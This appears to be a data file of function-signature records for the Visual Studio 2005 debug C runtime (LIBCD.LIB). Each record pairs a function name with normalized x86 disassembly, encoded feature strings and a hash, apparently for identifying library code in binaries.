+__wmakepath,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",AhxfFU+LzAoAAAAAR071hDWmiOYAAAAAISBBJYp3DJioZZ9rincMmIp3DJghIEElyebY/4p3DJhHTvWEISBBJYp3DJiI0PiYT4vMCgAAAAAAAAAAXqODJzWmiOYAAAAAiND4mIjQ+JjJ5tj/qGWfa4p3DJghIEElISBBJYp3DJiYw8s2ISBBJTWmiObofidMNaaI5l6jgydeo4MnR071hIp3DJgAAAAA6H4nTDWmiOZHTvWEincMmIp3DJghIEElyebY/4p3DJjJ5tj/jLRRTop3DJghIEElmMPLNiEgQSUAAAAAincMmAIcXxUhIEElXqODJ0+LzAoAAAAA,[],89db4815b5a2fcb6a4df69b9ce9ffb385ff22ba6,VS2005,LIBCD.LIB
+___init_numeric,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],0\nXOR R32,R32\nMOV R16,WORD PTR DS:[CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR DS:[CONST],0",13fal0+LzAoAAAAArydXXE+LzAoAAAAAxJKmaE+LzAoAAAAAXeZtzyZpzBCvJ1dcJmnMEKoGQfHEkqZoqgZB8SDxKVLEkqZoNKZGt13mbc/3p5pNT4vMCgAAAAAAAAAA96eaTWsjIA7Xd9qXhoV7iU+LzAoAAAAAxJKmaE+LzAoAAAAAayMgDhrzswmGhXuJIPEpUk+LzAoAAAAAGvOzCU+LzAoAAAAA,[],29edd46d556ef2ed9a9a2b50fa0fa26c118ec1d5,VS2005,LIBCD.LIB
+__ismbcpunct,"MOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nXOR R32,R32\nMOV R16,WORD PTR DS:[R32*2+CONST]\nAND R32,CONST\nTEST R32,R32\nJCC CONST",QiIDS3bbIJ70Ke4IoDc6oU+LzAoAAAAAThca5ZZz8F8kSWWgQUXQG0+LzAoAAAAAZnkxNU+LzAoAAAAAaz/TBFJnfwYNzMABT4vMCgAAAAAAAAAADczAAU+LzAoAAAAA9CnuCKA3OqEAAAAAmdT0gGs/0wRmeTE1Umd/BnbbIJ5CIgNLSsDrlk4XGuWZ1PSA9CnuCEFF0BsAAAAAdtsgnk+LzAoAAAAAJElloJZz8F/0Ke4IlnPwX0FF0BsAAAAA,[],1a9c79959d64ebab4e2158322173f3ee92cb6f80,VS2005,LIBCD.LIB
+_scanf,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32",nIZROORSvJ+S9NEBO4+r5eRSvJ8AAAAA5FK8n5yGUThkdeJ8kvTRAeRSvJ87j6vlZHXifAAAAAAAAAAAZWXpEZyGUTgAAAAA,[],cceff76d6655eef2ac8e7d3e0a0a9dbc365cf61f,VS2005,LIBCD.LIB
+_wmainCRTStartup,"PUSH CONST\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],0\nCALL CONST\nCALL CONST\nMOV DWORD PTR DS:[0],R32\nCALL CONST",3B+M86q9IlR3PovQdz6L0AAAAAAAAAAAqr0iVAAAAAAAAAAA,[],25289997f04bc1de2bbba2ef72c442602533cbb2,VS2005,LIBCD.LIB
+__amsg_exit,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nPUSH CONST\nCALL DWORD PTR DS:[0]\nADD ESP,CONST\nPOP EBP",H/nyOwAAAAAAAAAAOWijNHBlAGMf+fI7cGUAYwAAAAAAAAAA,[],2430244eab294cb952a85c3ba2425aa4f603ef83,VS2005,LIBCD.LIB
+__aullrem,"DIV R32\nMOV R32,R32\nMUL DWORD PTR SS:[ESP+CONST]\nXCHG R32,R32\nMUL DWORD PTR SS:[ESP+CONST]\nADD R32,R32\nJCC CONST",OaywaTqkpDSchlE4kTDPGKN6GjvopOJGo3oaO4JLXxQAAAAALKZ5dF5htw8AAAAA6KTiRl5htw8AAAAAnIZRODqkpDQhh3ljgktfFIJLXxQ5rLBpXmG3DwAAAAAAAAAAIYd5YyymeXSchlE4nIZROCymeXQ6pKQ0OqSkNCymeXQAAAAA,[],a64d88a907eed793f16c4cdabe2a6bae3ad398d2,VS2005,LIBCD.LIB
+_wcsrchr,"MOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R16,WORD PTR DS:[R32]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nADD CONST,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nTEST R32,R32\nJCC CONST",Ju7hZU+LzAoAAAAAT4vMCgAAAAAAAAAAXqODJwmX7pwAAAAAfrgK5Sbu4WWgNzqhKB22qAmX7pxeo4MnfrgK5X64CuVeo4MnoDc6oU+LzAoAAAAAXqODJygdtqgAAAAA6EX5tygdtqgAAAAACZfunH64CuV+uArl,[],37b7ba8fddcdc9a5438a8dda2f016add80aef751,VS2005,LIBCD.LIB
+__setjmp3,"PUSH R32\nPUSH R32\nLEA R32,DWORD PTR SS:[ESP+CONST]\nLEA R32,DWORD PTR DS:[R32+CONST]\nCMP R32,CONST\nJCC CONST",1332XVLONpW95BdBUs42lQAAAAAAAAAAFjgIInFalDrXffZdqeQ3UxY4CCL0Ke4IveQXQSjiYecqs0Le1332Xdd99l1xWpQ69CnuCFLONpUAAAAAKrNC3ijiYecAAAAAcVqUOlLONpUAAAAAKOJh51LONpUAAAAA,[],ff814153e9772e9f5814fbb1385b7ac33dc390c0,VS2005,LIBCD.LIB
+?_ValidateExecute@@YAHP6GHXZ@Z,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL DWORD PTR DS:[0]\nTEST R32,R32",lnPwX9Uc1LYAAAAA1RzUtgAAAAAAAAAAsurm89Uc1LaWc/Bf,[],e6b2cb91a468e0409efefe2b6145d20a4003d34f,VS2005,LIBCD.LIB
+?_ValidateWrite@@YAHPAXI@Z,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32",elpST9Uc1LaWc/Bf1RzUtgAAAAAAAAAAlnPwX9Uc1LYAAAAA,[],64021c0d28827fdf17928beca6c7e3b20d755a7d,VS2005,LIBCD.LIB
+?_ValidateRead@@YAHPBXI@Z,"MOV DWORD PTR SS:[EBP+CONST],0\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV ESP,EBP\nPOP EBP\nRETN",1RzUtgAAAAAAAAAA4HgnVAAAAAAAAAAAelpST9Uc1LbgeCdU,[],0c498168cc846defbb170bec91c8b781ea3f29f8,VS2005,LIBCD.LIB
+_vswprintf,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32",5FK8n5yGUTichlE4jNC7ers9SYUAAAAAkvTRAeRSvJ87j6vlmL5PCae0XCQAAAAAjNC7eqe0XCQAAAAAnIZROORSvJ+S9NEBuz1JhQAAAAAAAAAAO4+r5eRSvJ8AAAAA5FK8n5yGUTikluVCkvTRAeRSvJ87j6vlZWXpEZyGUTgAAAAAFnKdaLs9SYUAAAAApJblQozQu3qYvk8Jp7RcJIzQu3oWcp1onIZROORSvJ+S9NEBO4+r5eRSvJ8AAAAA,[],d5d003c6db1d97563de3307e70ea091166b58bb5,VS2005,LIBCD.LIB
+__strdate,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL DWORD PTR DS:[0]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST",nh7j4QAAAAAAAAAA,[],39b72a720b98e7bba2fdda07317b87e936d7601f,VS2005,LIBCD.LIB
+__dosmaperr,"MOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],CONST\nJCC CONST",g/KBGU+LzAoAAAAAnIZROJyGUTjjMNBoiw0UTIPygRmLDRRMHFITMpyGUTgAAAAAwCFsGU+LzAoAAAAA4zDQaF6jgyfAIWwZXqODJ9TZ7ssAAAAAnIZROIsNFEychlE4iw0UTIPygRkZpmb/nIZROIsNFEwZpmb/GaZm/0+LzAoAAAAAGaZm/0+LzAoAAAAA1Nnuy5yGUTjjMNBoT4vMCgAAAAAAAAAA,[],4bf669f1fd7103d9c3bb6591b3a09fbc4e932bcb,VS2005,LIBCD.LIB
+__open,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32",Elr+TgAAAAAAAAAA,6KRdaE+LzAoAAAAA1Nnuy/Qp7gichlE4C9OeU9TZ7ssAAAAAjseVaVJnfwYAAAAA9CnuCJ0cG6sAAAAA9CnuCJ0cG6sAAAAAUmd/BtTZ7stSZ38GwZugLgAAAAAAAAAAZoKcu9TZ7stcjBtoJCYl6HZSfg6Ox5VpUmd/BmaCnLsL055TnRwbq+ikXWjBm6AunIZROPQp7gheo4MnT4vMCgAAAAAAAAAAXIwbaNTZ7ssAAAAA6KRdaE+LzAoAAAAAXqODJ+ikXWgAAAAAdlJ+DlJnfwYAAAAA9CnuCJ0cG6sAAAAAnIZROPQp7gichlE4,374c3aeedb1623147c0dc561f1353e1c48b874c4,VS2005,LIBCD.LIB
+__sopen,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],CONST\nMOV DWORD PTR SS:[EBP+CONST],0\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nTEST R32,R32",nIZROPQp7gichlE49CnuCJ0cG6sAAAAAJCYl6AD+dWqOx5VpnRwbq+ikXWjBm6AunIZROPQp7gheo4MnT4vMCgAAAAAAAAAAALyuivQp7gichlE46KRdaE+LzAoAAAAAUmd/BtTZ7stSZ38GXqODJ+ikXWgAAAAAAP51atTZ7stSZ38G9CnuCJ0cG6sAAAAA6KRdaE+LzAoAAAAA1Nnuy/Qp7gichlE4Umd/BmaCnLsL055T9CnuCJ0cG6sAAAAAC9OeU9TZ7ssAAAAAwZugLgAAAAAAAAAAjseVaVJnfwYAAAAAZoKcu9TZ7ssAvK6K,[],958d9a68bb2e935f5bafd6b6bf9c2f9fd38ad158,VS2005,LIBCD.LIB
+_strpbrk,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nXOR R32,R32\nPUSH R32\nPUSH R32\nPUSH R32\nPUSH R32",92ZeLxehh24AAAAAF6GHbgAAAAAAAAAA1ZDj64/izv0AAAAA5qY8cUFF0BvVkOPrQUXQG4/izv0AAAAAj+LO/Rehh26qtBmvqrQZr4/izv33Zl4vj+LO/UFF0BvVkOPr,[],f11f4e88c2fa7d63fd0fb4721fe140e474e35978,VS2005,LIBCD.LIB
+__handle_qnan2,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nFLD QWORD PTR SS:[EBP+CONST]\nFADD QWORD PTR SS:[EBP+CONST]\nFSTP QWORD PTR SS:[EBP+CONST]\nCMP DWORD PTR DS:[0],0\nJCC CONST",T4vMCgAAAAAAAAAA/Gy9jE+LzAoAAAAAdALl0E+LzAoAAAAAf6yAJPxsvYx0AuXQ,[],bf5a537d8316cd5c3ba742e5f3df40fc19a808df,VS2005,LIBCD.LIB
+__handle_qnan1,"MOV DWORD PTR DS:[0],CONST\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nFLD QWORD PTR SS:[EBP+CONST]",/Gy9jADh1msAAAAAwvNIcgDh1msAAAAAOWijNPxsvYzC80hyAOHWawAAAAAAAAAA,[],99d65d186780ec9e644a94618610a4910d7669dc,VS2005,LIBCD.LIB
+__errcode,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nTEST R32,R32\nJCC CONST",9CnuCNUc1LYAAAAADpXpTA6V6Uz0Ke4IjSLt8A6V6Uz0Ke4I9CnuCNUc1LYAAAAAlnPwX9Uc1LYAAAAA1RzUtgAAAAAAAAAA9CnuCNUc1LYAAAAADpXpTA6V6Uz0Ke4I9CnuCNUc1LYAAAAADpXpTJZz8F/0Ke4I9CnuCNUc1LYAAAAADpXpTA6V6Uz0Ke4I,[],3fe61e70e5c9169e05eeb2431a7f85b7a1c27b1b,VS2005,LIBCD.LIB
+__except2,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR DS:[0],0\nJCC CONST",lbfCUk+LzAoAAAAAT4vMCgAAAAAAAAAAnIZROJW3wlKpyIwEqciMBE+LzAoAAAAAZx09gpW3wlKchlE4U91slWcdPYIMlWWLDJVli5W3wlKchlE4,[],44d35242ba4b422bf27dffaa035cbfbe7c37d155,VS2005,LIBCD.LIB
+__except1,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR DS:[0],0\nJCC CONST",T4vMCgAAAAAAAAAAVoJVV5W3wlKchlE4nIZROJW3wlIhZ5t+U91slWcdPYJWglVXlbfCUk+LzAoAAAAAIWebfk+LzAoAAAAAZx09gpW3wlKchlE4,[],02e234c48dcb52379498b297ef873d5f36d868d6,VS2005,LIBCD.LIB
+__umatherr,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nFLD QWORD PTR SS:[EBP+CONST]\nJMP SHORT CONST",pNZamE+LzAoAAAAAtlbY90+LzAoAAAAAT4vMCgAAAAAAAAAAaXbfEbZW2PfrvJDweFnRr6TWWphpdt8R67yQ8E+LzAoAAAAA,[],fe1e785f5fdcaa8eb80e0f02f8eb79223a808b23,VS2005,LIBCD.LIB
+__raise_exc,"MOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32]\nAND R32,CONST\nNEG R32\nSBB R32,R32\nINC R32\nAND R32,CONST\nSHL R32,CONST",NKSM+kgxAKQAAAAAcD0NNQ6V6Uw1OUYqDpXpTA6V6Uw1OUYqDpXpTA6V6UzZKwJgm64p1zHpBKAAAAAAs7NuMX4tBQqbrinXZ9ss5HPZbNOchlE4NTlGKg6V6UwAAAAAc9ls04usVzUAAAAA2SsCYA6V6UyaJT3bNKSM+kgxAKQAAAAAMekEoIdJFIwvEao1iw0UTDSkjPqLDRRMGPpiNg6V6Uw1OUYqDpXpTEltX7b8mYMRnIZROHPZbNOchlE4LxGqNYdJFIwAAAAAiw0UTDSkjPpeo4Mnm64p10gxAKQAAAAADpXpTA6V6UyaJT3b/JmDEUltX7YAAAAAXqODJ4usVzUAAAAAh0kUjGfbLOS2oJo9miU92w6V6UyaJT3bSDEApC/TJAiLDRRMm64p134tBQoAAAAA/JmDEQ6V6UwAAAAASW1ftosNFEyLDRRMNTlGKg6V6UwAAAAAtqCaPQAAAAAAAAAAfi0FCn4tBQovEao15yckAg6V6UyaJT3bDpXpTA6V6UyaJT3bmiU923A9DTUY+mI2iw0UTDSkjPqchlE4iw0UTIjN87peo4MnLxGqNX4tBQoAAAAAOtSLv4usVzUAAAAADpXpTA6V6Uz8mYMRnIZROJuuKdeLDRRMXqODJ7OzbjEAAAAAiM3zurOzbjEAAAAAfi0FCgJGY52brinXi6xXNQAAAAAAAAAAnIZRODrUi79eo4MnXqODJ0gxAKQAAAAADpXpTHA9DTUY+mI2iw0UTIjN87peo4MnNKSM+rOzbjEAAAAAm64p1wJGY50AAAAADpXpTA6V6Uw1OUYqXqODJ0gxAKQAAAAAmiU92w6V6UzZKwJgiM3zukgxAKQAAAAANTlGKg6V6UwAAAAAAkZjnTHpBKCbrinXL9MkCLOzbjEAAAAAc9ls04usVzUAAAAA,[],f7c1d7a4130ee865b7bf67a92531f991bf14151a,VS2005,LIBCD.LIB
+__set_errno,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],CONST\nJCC CONST",nIZROE+LzAqchlE4T4vMCgAAAAAAAAAAnIZROIPygRleo4MnXqODJ0+LzAoAAAAAGaZm/0+LzAoAAAAA1hmIcRmmZv+chlE4g/KBGU+LzAoAAAAA,[],5ba22b67f57e18a448defb9a27764dca5a205f83,VS2005,LIBCD.LIB
+__handle_exc,"PUSH CONST\nCALL CONST\nADD ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nXOR R32,R32\nCMP DWORD PTR SS:[EBP+CONST],0",TjbJfGIhCkTORR5kR/erETqNu5flMR9hDpXpTA6V6Uyf84OROo27l7AGllUiXRtIiw0UTLK8/CmchlE4n/ODkQ6V6UwAAAAAnIZROLAGllUiXRtI9ossPgJIKj4AAAAAnIZROAJIKj6z9076nIZROLK8/Cl+RkN0Il0bSPPH9UIOlelM9ossPvRtnfIAAAAA5TEfYY2gHmxnBrqUpU8xJn5GQ3SLDRRMsrz8KR983R72iyw+dnvgNJyGUTgOlelMsAaWVfPH9UIOlelMiw0UTJyGUTgOlelMDpXpTPvevnQOlelMsrz8KXTJLCr2iyw+Zwa6lAJIKj4AAAAADpXpTPPH9UIOlelMfkZDdLK8/Ck1FnITDpXpTMbHf0SchlE4DpXpTPvevnSf84OR9G2d8g6V6UwAAAAADpXpTPPH9UKb2tbxnIZROMbHf0RONsl8NRZyE6PnruMAAAAAn/ODkQ6V6UwAAAAAsrz8KQjxsaL2iyw+m9rW8QAAAAAAAAAAo+eu4w6V6UwAAAAAsrz8KXTJLCr2iyw+xsd/RGIhCkTORR5kAkgqPqPnruMAAAAA+96+dA6V6Uz73r509ossPmn92woAAAAA+96+dPvevnT73r509ossPgJIKj4AAAAAAkgqPqPnruMAAAAAzkUeZHZ74DQAAAAAdMksKqPnruMAAAAA+96+dA6V6UwKEAekjaAebDZOyWD0Ke4I+96+dPvevnSlTzEmfkZDdLK8/Ck1FnITYiEKRHZ74DQAAAAAH3zdHqPnruMAAAAAdMksKqPnruMAAAAAIugv0jqNu5flMR9hChAHpEf3qxEi6C/S8Bo+MQ6V6UwOlelM9CnuCMZkN30AAAAAaf3bCqPnruMAAAAACPGxog6V6UwAAAAA88f1QgAAAAAAAAAAs/dO+pyGUTgAAAAANRZyE6PnruMAAAAANk7JYIsNFEwAAAAAAkgqPpyGUTgAAAAAxmQ3fYsNFEwAAAAA,[],0c890f6376e4375631a1ef6df737164829ab2d3b,VS2005,LIBCD.LIB
+??0__non_rtti_object@@QAE@PBD@Z,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST",819iSQAAAAAAAAAA,8JK7igAAAAAAAAAA,7d821a3da801861a2988fc47ca66aa369fd08cff,VS2005,LIBCD.LIB
+??0bad_cast@@QAE@ABQBD@Z,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST",819iSQAAAAAAAAAA,F7kOJQAAAAAAAAAAmPgKvBe5DiXjpgfc46YH3Be5DiUAAAAA,7d821a3da801861a2988fc47ca66aa369fd08cff,VS2005,LIBCD.LIB
+___RTtypeid,"PUSH CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nPUSH CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nMOV DWORD PTR SS:[EBP+CONST],0",gOYcvAAAAAAAAAAABtWLo1GLN5iUWl40PN6MpgAAAAAAAAAABuQ7B4DmHLwAAAAAUYs3mDzejKYG5DsHlFpeNDzejKYG5DsH,[],3778c16a338178dc76d0e3bbef1fd47ab0efcffb,VS2005,LIBCD.LIB
+??1bad_cast@@UAE@XZ,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV ESP,EBP\nPOP EBP",SiDzSAAAAAAAAAAA,T4vMCgAAAAAAAAAAj+s7c0+LzAqNTJ++jUyfvk+LzAoAAAAA,cb66b195470fb06c5b60708d6c258e88bf29593c,VS2005,LIBCD.LIB
+??0__non_rtti_object@@QAE@ABV0@@Z,"MOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]",VtebJROvlqUAAAAAE6+WpQAAAAAAAAAA,[],7d821a3da801861a2988fc47ca66aa369fd08cff,VS2005,LIBCD.LIB
+??_G__non_rtti_object@@UAEPAXI@Z,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV ESP,EBP\nPOP EBP\nRETN CONST",z+UvqQAAAAAAAAAAMX02AAAAAAAAAAAAJi2KbzF9NgDP5S+p,[],6616d296dd10b6fe52e8ddf119f5163a162b0f15,VS2005,LIBCD.LIB
+??0bad_typeid@@QAE@ABV0@@Z,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST",819iSQAAAAAAAAAA,Jj8LAl6jgydXPcYIXqODJzF9NgAAAAAAgEplWTF9NgAAAAAAVz3GCF6jgycAAAAAMX02AAAAAAAAAAAA+HqVnoBKZVkmPwsC,7d821a3da801861a2988fc47ca66aa369fd08cff,VS2005,LIBCD.LIB
+___RTDynamicCast,"MOV DWORD PTR SS:[EBP+CONST],0\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32]",QUXQG4DmHLwAAAAABtWLo6Rr9JdmeTE1gOYcvAAAAAAAAAAA/NFdcpyGUTgAAAAAR1vJuzqNu5d6+Mv9Oo27l/Qp7gjYLzgTZnkxNYDmHLwAAAAAevjL/fQp7ggAAAAA2C84E/Qp7ggAAAAApGv0l5b8vvP80V1y/NFdcpyGUTgAAAAAlvy+80dbybv80V1y9CnuCEFF0BsAAAAAnIZRODqNu5d6+Mv9,[],6c87e05ce6cc0a9f93bcc3198dcc1e6061dad46e,VS2005,LIBCD.LIB
+??0bad_typeid@@QAE@PBD@Z,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST",8JK7igAAAAAAAAAA,F7kOJQAAAAAAAAAAmPgKvBe5DiXjpgfc46YH3Be5DiUAAAAA,b9ff14c244275f66bccda355c394956258459f37,VS2005,LIBCD.LIB
+??0bad_cast@@QAE@ABV0@@Z,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST",819iSQAAAAAAAAAA,XqODJzF9NgAAAAAAgEplWTF9NgAAAAAAVz3GCF6jgycAAAAAMX02AAAAAAAAAAAA+HqVnoBKZVkmPwsCJj8LAl6jgydXPcYI,7d821a3da801861a2988fc47ca66aa369fd08cff,VS2005,LIBCD.LIB
+___RTCastToVoid,"MOV DWORD PTR SS:[EBP+CONST],0\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV DWORD PTR SS:[EBP+CONST],-1\nMOV R32,DWORD PTR SS:[EBP+CONST]",BtWLo0S4zesNzMABgOYcvAAAAAAAAAAARLjN64DmHLwAAAAADczAAYDmHLwAAAAA,[],5cd81f49b1b34ac1c01148d2fd8d765024a0ef3e,VS2005,LIBCD.LIB
+??1__non_rtti_object@@UAE@XZ,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV ESP,EBP\nPOP EBP",SiDzSAAAAAAAAAAA,SiDzSAAAAAAAAAAA,cb66b195470fb06c5b60708d6c258e88bf29593c,VS2005,LIBCD.LIB
+??_Gbad_typeid@@UAEPAXI@Z,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV ESP,EBP\nPOP EBP\nRETN CONST",Ji2KbzF9NgDP5S+pz+UvqQAAAAAAAAAAMX02AAAAAAAAAAAA,[],6616d296dd10b6fe52e8ddf119f5163a162b0f15,VS2005,LIBCD.LIB
+??_Gbad_cast@@UAEPAXI@Z,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV ESP,EBP\nPOP EBP\nRETN CONST",MX02AAAAAAAAAAAAJi2KbzF9NgDP5S+pz+UvqQAAAAAAAAAA,[],6616d296dd10b6fe52e8ddf119f5163a162b0f15,VS2005,LIBCD.LIB
+??1bad_typeid@@UAE@XZ,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV ESP,EBP\nPOP EBP",SiDzSAAAAAAAAAAA,YZAhrAAAAAAAAAAAT4vMCgAAAAAAAAAAj+s7c0+LzAphkCGs,cb66b195470fb06c5b60708d6c258e88bf29593c,VS2005,LIBCD.LIB
+?set_new_handler@@YAP6AXXZP6AXXZ@Z,"PUSH CONST\nCALL CONST\nADD ESP,CONST\nXOR R32,R32\nPOP EBP\nRETN",BFTEwgAAAAAAAAAAcMiU5ARUxMKPgmm2j4JptgAAAAAAAAAA,[],02040fab9471f492fe6073a7a819721d2e0afe26,VS2005,LIBCD.LIB
+__read,"MOV R32,DWORD PTR SS:[EBP+CONST]\nSAR R32,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nMOV R32,DWORD PTR DS:[R32*4]\nMOVSX R32,BYTE PTR DS:[R32+R32*8+CONST]\nCMP R32,CONST\nJCC CONST",BmKIwwZiiMNmeTE1FHK6BHs+2EfIEAcfdvz6pmaMeOOchlE4nIZROPLNH1tmeTE1yBAHHzUWchMAAAAAnIZROGaMeOOchlE4XqODJzUWchMAAAAAg65DXhqeNm57qn/hnIZROAZiiMNmjHjj8s0fW0+LzAoAAAAADoOE46PeoRZtSQUGZnkxNU+LzAoAAAAA7bLtN+ikXWgGYojDDTmJ1zUWchMAAAAABmKIw7LL/fnSbpJ2ez7YRzUWchMAAAAAMpbCukFF0BuchlE4BmKIw4OuQ157qn/hssv9+TKWwrp2/PqmBmKIw78T/3ropF1oGp42bjUWchMAAAAAe6p/4RqeNm4NOYnXZox44zUWchMAAAAANRZyE6PeoRYAAAAANRZyEzUWchMAAAAA0m6SdrLL/fngf4n5bUkFBje44iV7PthH31f92ZyGUTh2/Pqm377vWKPeoRZtSQUGnIZROA6DhONtSQUGe6p/4TaoB5UNOYnX6KRdaE+LzAoAAAAAez7YRzUWchMAAAAADTmJ116jgycAAAAANldfVqPeoRZtSQUGdvz6ppyGUTjo6htlbUkFBg6DhOPkx7XQNRZyEzZXX1YAAAAA4H+J+TKWwrp2/Pqmo96hFk+LzAoAAAAAbUkFBm1JBQYGYojDNqgHlTUWchMAAAAA5Me10N++71gAAAAAvxP/emZ5MTUGYojDQUXQG0+LzAoAAAAA6OobZU+LzAoAAAAAT4vMCgAAAAAAAAAABmKIwzUWchMAAAAAN7jiJd9X/dkUcroEZnkxNU+LzAoAAAAA,[],3ad525594480c669dcdec15efc2d937b692a993d,VS2005,LIBCD.LIB
